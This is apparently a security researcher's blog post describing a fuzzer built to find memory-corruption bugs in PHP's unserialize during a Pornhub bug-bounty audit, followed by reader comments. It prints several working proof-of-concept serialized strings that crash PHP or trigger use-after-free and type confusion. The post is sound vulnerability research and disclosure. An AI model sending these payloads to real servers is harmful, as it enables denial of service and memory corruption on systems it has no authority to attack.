While auditing Pornhub we have stumbled across several pages where user input was evaluated by unserialize and the result was reflected back to the page. After enumerating class names from known frameworks and testing for old vulnerabilities in unserialize itself we realized that it could be much harder to exploit this issue than initially assumed.
The first thought was: OK, why not just find a new 0day in unserialize? This function has a very bad history and many bugs have been discovered over the past years. It can’t be /that/ hard, challenge accepted! I spent some time on reading code and checking fixes for old bugs, but I couldn’t find anything interesting. Most of the bugs from the last years were type confusions and use-after-free vulnerabilities. In most cases the bugs were so simple that twiddling some values in a legit serialized string could lead to pwnage. So, why not just write a fuzzer that crafts syntactically correct strings and passes them to unserialize?
At that point the motivation was not only to get a bounty from Pornhub but also to find a new PHP bug since there could be no way that unserialize is secure. In the end, this project was very helpful to earn some money: How we broke PHP, hacked Pornhub and earned $20,000
Unserializing data from user input in PHP is dangerous for the following reasons:
- As we all know, methods of unserialized classes can be invoked (ROP in PHP applications).
- It is possible to set references at almost arbitrary locations (often leads to use-after-free vulnerabilities).
- Types of variables can be defined in the serialized string (can lead to type confusion if internal classes make wrong assumptions about property types).
Contents
Unserialize Syntax
Before a fuzzer can be implemented the syntax of PHP’s serialize must be understood. There are 12 different symbols, each of them for one data type and use case. The following code shows the switch table that can be found in the source code of PHP
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 | "/ext/standard/var_unserializer.c" [...] switch (yych) { case 'C': case 'O': goto yy13; case 'N': goto yy5; case 'R': goto yy2; case 'S': goto yy10; case 'a': goto yy11; case 'b': goto yy6; case 'd': goto yy8; case 'i': goto yy7; case 'o': goto yy12; case 'r': goto yy4; case 's': goto yy9; case '}': goto yy14; default: goto yy16; } [...] |
Accordingly, the following table shows all symbols and their meanings. It is helpful to understand how PHP’s variables work. PHP Internals Book – Basic zval structure
Symbol | Data Type | Description | Example |
---|---|---|---|
N | null | A NULL value | N; |
b | bool | The value can either be true(1) or false(0) | b:1; |
i | int | Numeric value | i:1337; |
d | double | Double value. Value can be provided as a normal floating value or as E value. (e.g. 1.234E+20). There are three special values: INF| -INF| NAN | d:1.337; d:1.3333333E+20 |
s | string | A serialized string contains the string length and the actual string surrounded by double quotes | s:4:"meow"; |
S | encoded string | The encoded string is very similar to the normal string. The difference is that characters can be hex encoded: A = \41 . This type allows to make the serialized string printable and is very useful in case the server rejects certain characters | S:5:"me\00ow"; |
a | array | The array size is defined first. The actual content remains between the {} and must be provided as key value pairs. | a:1:{i:0;s:5:"value";} |
O | Object | Objects have the class name at the beginning followed by the property definitions. Similar to arrays| key-value pairs are required here. Properties can either be public| private or protected. A public property only requires to set the actual property name. For private and static properties some extra information must be prefixed: Following list shows how a property named test is encoded for different visibilities: public: test private: \x00Classname\x00test protected: \x00*\x00test | O:8:"stdClass":1:{s:4:"test";i:123;} |
C | Custom Object | Several classes use a custom unserializer and require to use the C symbol. Similar to a normal object the class name is defined first and is followed by the custom serialized string. Contrary to a normal object the number before the custom content defines the length of the custom content instead of the number of properties. | C:11:"ArrayObject":21:{x:i:0;a:0:{};m:a:0:{}} |
r | reference | A reference to an existing value in the serialized string. | r:1; |
R | reference | A reference to an existing value in the serialized string. The is_reference attribute of the zval is set | R:1; |
o | wtf object | The purpose of the lowercase o is unclear. It represents an object but it is not possible to set the class name (defaults to stdClass). The misplaced " in the sample is not a typo. | o:1:"s:4:"prop";i:1;} |
Each unserialized value has an index that can be referred by r and R. The first element (outer array or object) has key 1. References using the uppercase R and keys of any kind (array keys and property names) do not increase the index. Keys and property names can be of type i, s and S. PHP’s unserializer is very strict about the syntax. If a single character is not legit the function aborts the parser and nothing is returned. I had to make sure that the fuzzer did not generate invalid test samples for optimal efficiency.
Fuzzing Unserialize
A good fuzzer should be able to generate any syntactically correct payload. I decided to ignore parser bugs and focused on finding incorrect handling of variables and references. Unfortunately, PHP’s serialize() is not capable of generating arbitrary outputs. For example it is not possible to define the same array key twice in the serialized string. Also one cannot place arbitrary references at arbitrary locations. That’s why I implemented a custom serializer that let me construct whatever I wanted.
1 2 3 4 5 6 7 8 9 10 11 12 | $o = new O("stdClass"); $o->set("prop", new I(1335)); $array = new A(); $array->set(123, new S("meow")); $array->set(123, new PRef($array)); $array->set(1, $o); echo $array; /* Result: a:3:{i:123;s:4:"meow";i:123;R:1;i:1;O:8:"stdClass":1:{s:4:"prop";i:1335;}} */ |
From here I only needed to obtain a list of internal classes and their properties from PHP’s source code. Now I was able to generate random samples and pass them to unserialize in order to (hopefully) trigger unexpected behavior.
Unexpected Behavior
You could argue that a memory corruption in PHP’s unserialize is in fact expected behavior because everyone knows the history of that function. However, the following events indicate that something went wrong during the unserialization process.
- Segmentation fault:
The most obvious event is a segmentation fault which can easily be detected by checking the return code of the process. - PHP prints zend_mm_heap_corrupted:
PHP uses its own memory manager for allocations. In case the allocator detects a corruption on the heap a corresponding message is printed. - &UNKNOWN;:
The type of a value is stored inside the zval structure and can be a number between 0 and 10. For example the type 1 indicates an integer and type 6 is used for strings. When a variable that is printed with var_dump has an unknown type (not in the range 0-10) the string “&UNKNOWN;” is printed instead. This indicates a memory corruption since it is normally not possible to craft a data type which is unknown to PHP. - Crafted integer zval:
In PHP 5.6 zval structs have a size of 24 bytes. If this struct is entirely filled with \x01 the resulting value is an integer with the value 72340172838076673. I let the fuzzer place 24 byte long strings consisting of \x01 in the test cases. The presence of 72340172838076673 in the resulting deserialized data indicates that a use-after-free vulnerability has been found and successfully been exploited. - Incorrect return value:
The fuzzer always used an array as outer element leading to two possible return data types of unserialize: “array” when no errors occurred, or “NULL” in case the input was not satisfying for unserialize. Every data type different to array or null means that something unexpected has happened. - Post-unserialize allocation:
The occurence of variables that are defined between unserializing and var_dump most likely are a sign of a use-after-free vulnerability.
Test Cases
With the different behaviors that could occur in mind I designed the following test cases which were executed one after another with the same payload.
- Unserialize only:
This test case does nothing but unserializing the provided serialized string. - Unserialize var_dump:
Here, the string is unserialized and every value in the result is accessed and printed via var_dump. - Unserialize unserialize var_dump:
A second unserialize has been added. Its purpose is to increase the amount of memory operations after the initial unserialize. - Unserialize alloc var_dump:
Here, the string is unserialized, some fix values are assigned to variables and finally the result of unserialize is printed.
All test cases are required because bugs can occur in different stages (e.g. unserialize, printing or shutdown of the PHP engine). By looking at the results of the different test cases it is also possible to determine where the bug has happened (if any was found).
Calibration and Tests
Before running the fuzzer I looked at PoCs of some old unserialize bugs to make sure I didn’t miss something. Turned out the fuzzer covered almost everything from the past. A first test against an old PHP version produced more segfaults than the kernel could handle. A second test against a recent PHP 7 version also spit out results very quickly. Unfortunately, it was a very unreliable bug that has not been investigated further – yet. The first tests against PHP 5.6.21 only resulted in some lame DoS bugs which are described at the bottom of this article.
Findings
The very first version of the fuzzer logged the serialized strings and var_dump outputs of all test cases and ended up filling my hard drive very quickly. It took some time and adjustments to the fuzzer until unexpected behavior was detected. Finally, after setting a decent fuzzing depth and generating large samples that were about 1-2M in size I found unexpected behavior. The interesting thing here was, that it didn’t happen reliably and depended on how many objects were allocated before or while unserializing the string. Together with evonide we figured out that the required number of objects was around 10000. After excluding irrelevant classes one by one I finally managed to get a working testcase that only was ~1000 bytes in size. After some more work I finally crafted the smallest possible test case.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 | $serialized_string = 'a:1:{i:0;a:3:{i:1;N;i:2;O:10:"ZipArchive":1:{s:8:"filename";i:1337;}i:1;R:5;}}'; $array = unserialize($serialized_string); gc_collect_cycles(); $filler1 = "aaaa"; $filler2 = "bbbb"; var_dump($array[0]); /* Result: array(2) { [1]=> string(4) "bbbb" [2]=> object(ZipArchive)#1 (5) { ["status"]=> int(0) ["statusSys"]=> int(0) ["numFiles"]=> int(0) ["filename"]=> string(0) "" ["comment"]=> string(0) "" } } */ |
Unfortunately, it is not guaranteed that ZipArchive exists on a target system since some distributions make it optional. So I continued fuzzing and included the amount of objects/arrays in the sample that were required to trigger the first bug. I found another bug almost instantaneously. Similar to the first test case I had to minimize a 500kb sample before going on.
1 2 3 4 5 6 7 8 9 10 11 | $serialized_string = 'a:1:{i:1;C:11:"ArrayObject":37:{x:i:6;a:2:{i:1;R:4;i:2;r:1;};m:a:0:{}}}'; $array = unserialize($serialized_string); gc_collect_cycles(); $filler1 = "aaaa"; $filler2 = "bbbb"; var_dump($array); /* Result: string(4) "bbbb" */ |
This bug seemed to be promising. Unfortunately, it turned out that it was not suitable for remote exploitation in this form. A lot of follow-up research and adjustments had to be done. For more information you can read evonide’s write-up Breaking PHP’s Garbage Collection and Unserialize.
Bonus Round
Unserialize is still riddled with bugs. Here are a few strings that lead to – lets say – “problems”.
1 2 3 4 5 6 7 8 | // php 5.x, 7.x O:9:"SoapFault":1:{s:11:"faultstring";r:1;} // php 7.x (5.x with var_dump) C:3:"GMP":23:{s:1:"2";a:1:{i:46;R:1;}} // php 5.x, 7.x O:9:"Exception":1:{S:19:"\00Exception\00previous";r:1;} // php 7.x a:1:{i:0;O:9:"Exception":2:{S:7:"\00*\00file";s:5:"aaaaa";S:17:"\00Exception\00string";O:8:"stdClass":1:{S:1:"a";O:12:"DateInterval":1:{s:14:"special_amount";R:2;}}}} |
The first two bugs lead to stackoverflows and cause segmentation faults, the third payload consumes “some” CPU resources and the last one is a mid-unserialize type confusion.
Another bug can be triggered by using a custom class with a wakeup method. __wakeup gets invoked every time this object gets unserialized. In this example, the property kiri is a reference to the outer array which gets destroyed by setting $this->kiri.
1 2 3 4 5 6 7 8 | class hara { function __wakeup() { $this->kiri = 123; } } $bad = 'a:2:{i:0;O:4:"hara":1:{s:4:"kiri";R:1;}i:0;i:1;}'; $f = unserialize($bad); var_dump($f); |
- The string is passed to unserialize.
- As soon as the closing } for the object is found the wakeup method of the object is called.
- The wakeup method destroys the outer array.
- The unserializer tries to add the object to the array. Unfortunately, this array has already been destroyed.
- The application crashes.
When a value is assigned to a property the internal function zend_std_write_property is eventually reached. Here, the zval of the old data is copied into a temporary zval. This temporary zval is passed to zval_dtor where the actual contents are destroyed. In our example the zval represents the outer array and contains a pointer to a HashTable. zval_dtor does not do any refcounter checks and frees the HashTable without mercy. Unfortunately, unserialize still operates on this HashTable and will crash as soon the wakeup function returns.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 | "/Zend/zend_object_handlers.c" [...] ZEND_API void zend_std_write_property(zval *object, zval *member, zval *value, const zend_literal *key TSRMLS_DC) /* {{{ */ { [...] if (PZVAL_IS_REF(*variable_ptr)) { zval garbage = **variable_ptr; /* old value should be destroyed */ /* To check: can't *variable_ptr be some system variable like error_zval here? */ Z_TYPE_PP(variable_ptr) = Z_TYPE_P(value); (*variable_ptr)->value = value->value; if (Z_REFCOUNT_P(value) > 0) { zval_copy_ctor(*variable_ptr); } else { efree(value); } zval_dtor(&garbage); } [...] } |
This bug is a classical use-after-free vulnerability but sadly no zval but rather only a HashTable is freed. Nevertheless, this is still an exploitable bug that exists since early php4 versions. However, this bug is difficult to exploit as I could achieve no means to leak arbitrary memory with it. As such, it is difficult to craft necessary fake HashTables that could be used for further exploitation purposes.
Closing Words
PHP’s unserializer suffers from insecurity since its existence and probably will until it dies. The use of unserialize on user input should be considered critical in every pentest report – even when the PHP version is up to date.
Always keep in mind that deserialization of user input is a bad idea in every language if not done right. In Python (pickles) and Java (readObject) things are even worse because the deserializers allow to execute code using only language defaults. You should rely on less complex serialization formats like json.
The outcome of this project is very interesting as we expected to find vulnerabilities in unserialize itself but ended up finding 2 bugs in a totally different core component. It also shows that a highly specialized fuzzer can be very powerful.
At the moment I have no intention to release this fuzzer. Nevertheless, if you have questions you can leave me a comment or contact me via Twitter @haxonaut for further discussion.
Did you try to use any runtime memory checker? Does it make sense?
Memory checking can be used to spot some memory errors but I didn’t try it because one must accept a trade-off here:
While an extensive check could find errors it affects the samples/second rate drastically.
A solution that doesn’t check the whole memory doesn’t eat up that much time but could miss some issues.
HI Dario,
Thank you for sharing this. The article shows a very good and clear workflow.
> A good fuzzer should be able to generate any syntactically correct payload.
Good point.
From my experience (I may be actually wrong), most people looks for crashes while fuzzing. But you had a list of suspicious cases which should be investigated (“Unexpected Behavior” section). Did you make this list before actual fuzzing? Or, did you run the fuzzer first, and then derived those types of issues?
Hi,
before I wrote the fuzzer I already knew a lot about PHP and its internals and was able to create that list before starting to fuzz.
There are probably even more scenarios the list doesn’t cover because they are harder to predict. Especially when you hit a UAF vulnerability a lot of different things can happen.
Cool– thanks for the article
Thanks for sharing.
Really good read.